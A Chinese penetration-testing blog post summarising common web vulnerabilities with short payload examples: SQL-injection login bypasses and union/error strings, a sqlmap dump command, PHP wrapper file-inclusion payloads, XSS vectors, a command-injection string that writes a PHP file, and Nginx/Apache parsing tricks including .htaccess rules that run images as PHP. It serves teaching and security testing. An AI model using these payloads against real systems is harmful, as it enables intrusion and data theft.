【渗透测试】简单总结一些常见Web漏洞

SQL注入

定义:SQL注入就是将SQL语句插入到用户提交的可控参数中,改变原有的SQL语义结构,从而执行攻击者所预期的结果。

万能密码

命令
' or '1'='1
' or 1=1#
1'||'1
1'||1#
'='
'-'

报错注入

id=0 and updatexml(1,concat(0x7e,database(),0x7e),1)

联合注入

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

SQLMAP

-D Dataname -T tablename -C columnname --dump

文件包含漏洞

PHP伪协议

php://input

?file=php://input <?php phpinfo();?>

php://filter

allow_url_fopen 和 allow_url_include Off/On

?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

zip://

?file=zip://D:\zip.jpg%23phpinfo.txt

data://

allow_url_fopen 和 allow_url_include On/On

?filename=data://text/plain,<?php phpinfo();

?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

身份认证攻击

302跳转身份认证

爆破返回包都是302重定向跳转,

选择options-redirections-选中always,意思是总是跟随任何跳转,然后开始爆破。

basic认证攻击

XSS跨站脚本攻击

html中输出

<script>alert(1)</script>

事件中输出

<img src=# οnmοuseοver="location='';(alert(1));"/>
​
<img src=x οnerrοr=alert`1`>

属性中输出

<div class=message>
    <input name="content" value=" οnmοuseοver=alert(1) />" /> </div>

CSS中输出

<div class=message style="backgroud-image:url(‘javascript:alert(1)’)"  >

地址栏中输出

<a href="javascript:alert(1);">点击此处查看链接</a>
​
<a href="data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">xxx</a>
​

代码与命令执行漏洞

命令操作符

cmd1|cmd2

将cmd1的结果输出给cmd2

命令执行漏洞

127.0.0.1&&echo "<?php phpinfo();?>">"123.php"

system("whoami");

常见中间件和主机漏洞

Nginx-解析漏洞

畸形解析漏洞(test.jpg/*.php)

由于Nginx中php配置不当而造成的,与Nginx版本无关,对于任意文件名,在后面加上/任意文件名.php后该文件就会以php格式进行解析,如1.jpg/1.php

%00空字节代码解析漏洞

nginx<=0.8.37 存在解析漏洞,Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码,然后通过访问 xxx.jpg%00.php 来执行其中的代码

文件名逻辑漏洞

影响nginx版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 这一漏洞的原理是非法字符空格和截止符(%00)会导致Nginx解析URI时的有限状态机混乱,危害是允许攻击者通过一个非编码空格绕过后缀名限制。如:1.gif0x20.php

Apache-解析漏洞

文件名解析漏洞

用户配置不当,Apache解析从右至左进行判断,如果为不可识别解析,就再往左判断。如1.php.a.b.c,c不识别就会往前找,直到找到可识别后缀。

后缀包含换行符\x0A(CVE-2017-15715)

apache通过mod_php来运行脚本,其2.4.0-2.4.29版本中存在apache换行解析漏洞,在解析php时 xxx.php\x0A 将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。该漏洞属于用户配置不当产生的漏洞,与具体中间件版本无关。

.htaccess文件

前提:mod_rewrite 模块开启、AllowOverride All

这个.htaccess的意思就是把所有名字里面含有shell的文件当成php脚本来执行

<FilesMatch "shell">

SetHandler application/x-httpd-php

</FilesMatchc>

这里代码的意思可以让 .jpg后缀名文件格式的文件名以php格式解析

AddType application/x-httpd-php .jpg

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello_Brian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值